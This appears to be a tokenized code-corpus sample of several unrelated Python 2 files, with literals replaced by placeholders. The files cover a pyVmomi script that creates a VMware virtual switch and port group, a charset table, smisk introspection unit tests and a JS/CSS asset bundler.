<s> '''<STR_LIT>''' <EOL> import atexit <EOL> from pyVmomi import vim , vmodl <EOL> from pyVim import connect <EOL> from pyVim . connect import Disconnect <EOL> inputs = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def get_obj ( content , vimtype , name ) : <EOL> """<STR_LIT>""" <EOL> obj = None <EOL> container = content . viewManager . CreateContainerView ( content . rootFolder , vimtype , True ) <EOL> for c in container . view : <EOL> if c . name == name : <EOL> obj = c <EOL> break <EOL> return obj <EOL> def create_vswitch ( host_network_system , vss_name , num_ports , nic_name ) : <EOL> vss_spec = vim . host . VirtualSwitch . Specification ( ) <EOL> vss_spec . numPorts = num_ports <EOL> vss_spec . bridge = vim . host . VirtualSwitch . BondBridge ( nicDevice = [ nic_name ] ) <EOL> host_network_system . AddVirtualSwitch ( vswitchName = vss_name , spec = vss_spec ) <EOL> print "<STR_LIT>" , vss_name <EOL> def create_port_group ( host_network_system , pg_name , vss_name ) : <EOL> port_group_spec = vim . host . PortGroup . Specification ( ) <EOL> port_group_spec . name = pg_name <EOL> port_group_spec . vlanId = <NUM_LIT:0> <EOL> port_group_spec . vswitchName = vss_name <EOL> security_policy = vim . host . NetworkPolicy . SecurityPolicy ( ) <EOL> security_policy . allowPromiscuous = True <EOL> security_policy . forgedTransmits = True <EOL> security_policy . macChanges = False <EOL> port_group_spec . policy = vim . host . NetworkPolicy ( security = security_policy ) <EOL> host_network_system . AddPortGroup ( portgrp = port_group_spec ) <EOL> print "<STR_LIT>" , pg_name <EOL> def add_virtual_nic ( host_network_system , pg_name ) : <EOL> vnic_spec = vim . host . VirtualNic . Specification ( ) <EOL> vnic_spec . ip = vim . host . IpConfig ( dhcp = True ) <EOL> vnic_spec . mac = '<STR_LIT>' <EOL> host_network_system . AddServiceConsoleVirtualNic ( portgroup = pg_name , nic = vnic_spec ) <EOL> def main ( ) : <EOL> try : <EOL> si = None <EOL> try : <EOL> print "<STR_LIT>" <EOL> si = connect . Connect ( inputs [ '<STR_LIT>' ] , <NUM_LIT> , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] , version = "<STR_LIT>" ) <EOL> except IOError , e : <EOL> pass <EOL> atexit . register ( Disconnect , si ) <EOL> print "<STR_LIT>" <EOL> content = si . RetrieveContent ( ) <EOL> host = get_obj ( content , [ vim . HostSystem ] , inputs [ '<STR_LIT>' ] ) <EOL> host_network_system = host . configManager . networkSystem <EOL> create_vswitch ( host_network_system , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] ) <EOL> create_port_group ( host_network_system , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] ) <EOL> except vmodl . MethodFault , e : <EOL> print "<STR_LIT>" % e . msg <EOL> return <NUM_LIT:1> <EOL> except Exception , e : <EOL> print "<STR_LIT>" % str ( e ) <EOL> return <NUM_LIT:1> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from exc import * </s>
<s> app . sessions . ttl = <NUM_LIT:10> </s>
<s> '''<STR_LIT>''' <EOL> charsets = { <EOL> ur '<STR_LIT:ascii>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> } <EOL> '''<STR_LIT>''' <EOL> import codecs <EOL> for k in charsets . keys ( ) : <EOL> try : <EOL> codecs . lookup ( k ) <EOL> except LookupError : <EOL> del charsets [ k ] <EOL> del k </s>
<s> from smisk . test import * <EOL> from smisk . util . introspect import * <EOL> from smisk . util . type import Undefined <EOL> class A ( object ) : <EOL> def __call__ ( self ) : <EOL> pass <EOL> def hello ( self , one , two , three = None , four = <NUM_LIT> , five = '<STR_LIT>' ) : <EOL> foo = '<STR_LIT>' <EOL> bar = '<STR_LIT>' <EOL> two = <NUM_LIT> <EOL> for baz in foo : <EOL> pass <EOL> return locals ( ) <EOL> def ping ( self , filter = None , * argz , ** kwargz ) : <EOL> pass <EOL> def none ( self ) : <EOL> pass <EOL> class B ( object ) : <EOL> def foo ( self ) : <EOL> pass <EOL> class IntrospectTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . expect_hello_info = { <EOL> '<STR_LIT:name>' : '<STR_LIT:hello>' , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT>' , Undefined ) , <EOL> ( '<STR_LIT>' , Undefined ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True <EOL> } <EOL> def test_2_info_methods ( self ) : <EOL> a = A ( ) <EOL> expected = self . expect_hello_info <EOL> returned = introspect . callable_info ( a . hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> returned = introspect . callable_info ( A . hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> b = B ( ) <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:args>' : ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> returned = introspect . callable_info ( b . foo ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> returned = introspect . callable_info ( B . foo ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function ( self ) : <EOL> def plain ( ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:args>' : ( ) , <EOL> } <EOL> returned = introspect . callable_info ( plain ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function_varargs ( self ) : <EOL> def varargs ( a , b = <NUM_LIT:1> , * args ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT:a>' , Undefined ) , <EOL> ( '<STR_LIT:b>' , <NUM_LIT:1> ) <EOL> ) , <EOL> } <EOL> returned = introspect . callable_info ( varargs ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_2_info_function_varkw ( self ) : <EOL> def foobar ( a = [ ] , b = <NUM_LIT:1> , ** xyz ) : <EOL> pass <EOL> expected = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:args>' : ( <EOL> ( '<STR_LIT:a>' , [ ] ) , <EOL> ( '<STR_LIT:b>' , <NUM_LIT:1> ) <EOL> ) , <EOL> } <EOL> returned = introspect . callable_info ( foobar ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> def test_3_ensure_va_kwa ( self ) : <EOL> a = A ( ) <EOL> try : <EOL> assert a . hello ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , * ( '<STR_LIT>' , '<STR_LIT>' ) ) == <NUM_LIT:0> , '<STR_LIT>' <EOL> except TypeError : <EOL> pass <EOL> a . hello = introspect . ensure_va_kwa ( a . hello ) <EOL> expected = self . expect_hello_info . copy ( ) <EOL> expected [ '<STR_LIT>' ] = True <EOL> expected [ '<STR_LIT>' ] = True <EOL> returned = introspect . callable_info ( a . hello ) <EOL> assert returned == expected , '<STR_LIT>' % ( returned , expected ) <EOL> assert a . hello ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , * ( '<STR_LIT>' , '<STR_LIT>' ) , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:2> } ) == { <EOL> '<STR_LIT>' : a , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:f>' <EOL> } <EOL> assert a . hello ( '<STR_LIT>' , '<STR_LIT>' ) == { <EOL> '<STR_LIT>' : a , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:f>' <EOL> } <EOL> a . none = introspect . ensure_va_kwa ( a . none ) <EOL> a . none ( ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> a . none ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , foo = <NUM_LIT:12> ) <EOL> def suite ( ) : <EOL> return unittest . TestSuite ( [ <EOL> unittest . makeSuite ( IntrospectTests ) , <EOL> ] ) <EOL> def test ( ) : <EOL> runner = unittest . TextTestRunner ( ) <EOL> return runner . run ( suite ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import os <EOL> import fnmatch <EOL> import hashlib <EOL> import sys <EOL> import optparse <EOL> import gzip <EOL> from collections import defaultdict <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> import envoy <EOL> import yaml <EOL> import slimit <EOL> import cssmin <EOL> OUTPUT_DIR = '<STR_LIT>' <EOL> CONFIG_FILE = '<STR_LIT>' <EOL> ASSETS_INFO_FILE = '<STR_LIT>' <EOL> def _log ( msg ) : <EOL> sys . stderr . write ( '<STR_LIT>' % msg ) <EOL> def load_config ( path ) : <EOL> return yaml . load ( open ( path ) ) <EOL> if sys . version < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> class GzipFile ( gzip . GzipFile ) : <EOL> def __enter__ ( self ) : <EOL> if self . fileobj is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> self . close ( ) <EOL> else : <EOL> GzipFile = gzip . GzipFile <EOL> class AssetManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , basedir = None ) : <EOL> self . config = config <EOL> self . basedir = basedir or os . getcwd ( ) <EOL> def _get_bundles_by_type ( self , type ) : <EOL> """<STR_LIT>""" <EOL> bundles = { } <EOL> bundle_definitions = self . config . get ( type ) <EOL> if bundle_definitions is None : <EOL> return bundles <EOL> for bundle_name , paths in bundle_definitions . items ( ) : <EOL> bundle_files = [ ] <EOL> for path in paths : <EOL> pattern = abspath = os . path . join ( self . basedir , path ) <EOL> assetdir = os . path . dirname ( abspath ) <EOL> fnames = [ os . path . join ( assetdir , fname ) <EOL> for fname in os . listdir ( assetdir ) ] <EOL> expanded_fnames = fnmatch . filter ( fnames , pattern ) <EOL> bundle_files . extend ( sorted ( expanded_fnames ) ) <EOL> bundles [ bundle_name ] = bundle_files <EOL> return bundles <EOL> def _compress ( self , data ) : <EOL> compresslevel = <NUM_LIT:9> <EOL> buffer = StringIO ( ) <EOL> with GzipFile ( fileobj = buffer , mode = '<STR_LIT:wb>' , <EOL> compresslevel = compresslevel ) as fout : <EOL> fout . write ( data ) <EOL> return buffer . getvalue ( ) <EOL> def _concat ( self , data , type ) : <EOL> sep = '<STR_LIT>' <EOL> if type == '<STR_LIT>' : <EOL> sep = '<STR_LIT:;>' <EOL> return sep . join ( data ) <EOL> def _minify ( self , data , type , paths = [ ] ) : <EOL> sep = '<STR_LIT>' <EOL> if type == '<STR_LIT>' : <EOL> sep = '<STR_LIT:;>' <EOL> custom = self . config . get ( '<STR_LIT>' ) <EOL> if custom is not None : <EOL> minify = lambda x : envoy . run ( custom , data = x ) . std_out <EOL> else : <EOL> options = self . config . get ( <EOL> '<STR_LIT>' , { '<STR_LIT>' : True } <EOL> ) <EOL> minify = lambda x : slimit . minify ( x , ** options ) <EOL> elif type == '<STR_LIT>' : <EOL> minify = cssmin . cssmin <EOL> def real_minify ( path , contents ) : <EOL> if '<STR_LIT>' in path : <EOL> return contents <EOL> return minify ( contents ) <EOL> minified = sep . join ( <EOL> [ real_minify ( path , contents ) for path , contents in zip ( paths , data ) ] <EOL> ) <EOL> return minified <EOL> def _process_bundle ( self , name , paths , type ) : <EOL> sha1 , opt_dash = '<STR_LIT>' , '<STR_LIT>' <EOL> raw_data = [ open ( path ) . read ( ) for path in paths ] <EOL> if self . config . get ( '<STR_LIT>' ) : <EOL> sha1 = hashlib . sha1 ( '<STR_LIT>' . join ( raw_data ) ) . hexdigest ( ) <EOL> opt_dash = '<STR_LIT:->' <EOL> file_ext = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . get ( type ) <EOL> fname_template = '<STR_LIT>' % ( name , opt_dash , sha1 , file_ext ) <EOL> concat_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> concat_data = self . _concat ( raw_data , type ) <EOL> self . write ( concat_fname , concat_data ) <EOL> minified_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> minified_data = self . _minify ( raw_data , type , paths = paths ) <EOL> self . write ( minified_fname , minified_data ) <EOL> gzipped_fname = fname_template . format ( suffix = '<STR_LIT>' , gz = '<STR_LIT>' ) <EOL> gzipped_data = self . _compress ( minified_data ) <EOL> self . write ( gzipped_fname , gzipped_data ) <EOL> return { <EOL> name : { <EOL> '<STR_LIT>' : [ os . path . relpath ( p , self . basedir ) for p in paths ] , <EOL> '<STR_LIT>' : sha1 , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : concat_fname , <EOL> '<STR_LIT>' : minified_fname , <EOL> '<STR_LIT>' : gzipped_fname , <EOL> } , <EOL> '<STR_LIT:size>' : { <EOL> '<STR_LIT>' : len ( concat_data ) , <EOL> '<STR_LIT>' : len ( minified_data ) , <EOL> '<STR_LIT>' : len ( gzipped_data ) , <EOL> } , <EOL> } <EOL> } <EOL> def write ( self , fname , data ) : <EOL> output = os . path . abspath ( self . config . get ( '<STR_LIT>' , OUTPUT_DIR ) ) <EOL> if not os . path . exists ( output ) : <EOL> os . makedirs ( output ) <EOL> path = os . path . join ( output , fname ) <EOL> with open ( path , '<STR_LIT:w>' ) as fout : <EOL> fout . write ( data ) <EOL> def write_info ( self , bundles_info ) : <EOL> self . write ( ASSETS_INFO_FILE , <EOL> yaml . dump ( dict ( bundles_info ) , default_flow_style = False ) ) <EOL> def get_bundles ( self ) : <EOL> bundles = { <EOL> '<STR_LIT>' : self . _get_bundles_by_type ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _get_bundles_by_type ( '<STR_LIT>' ) , <EOL> } <EOL> return bundles <EOL> def process_bundles ( self ) : <EOL> info = defaultdict ( dict ) <EOL> bundles = self . get_bundles ( ) <EOL> for bundle_type in bundles : <EOL> for name , paths in bundles [ bundle_type ] . items ( ) : <EOL> bundle_info = self . _process_bundle ( name , paths , bundle_type ) <EOL> info [ bundle_type ] . update ( bundle_info ) <EOL> return info <EOL> def main ( ) : <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> options , args = parser . parse_args ( ) <EOL> config_path = options . config <EOL> if config_path is None : <EOL> config_path = os . path . join ( os . getcwd ( ) , CONFIG_FILE ) <EOL> if not os . path . exists ( config_path ) : <EOL> _log ( '<STR_LIT>' % config_path ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> config = load_config ( config_path ) <EOL> manager = AssetManager ( config , options . basedir ) <EOL> bundles_info = manager . process_bundles ( ) 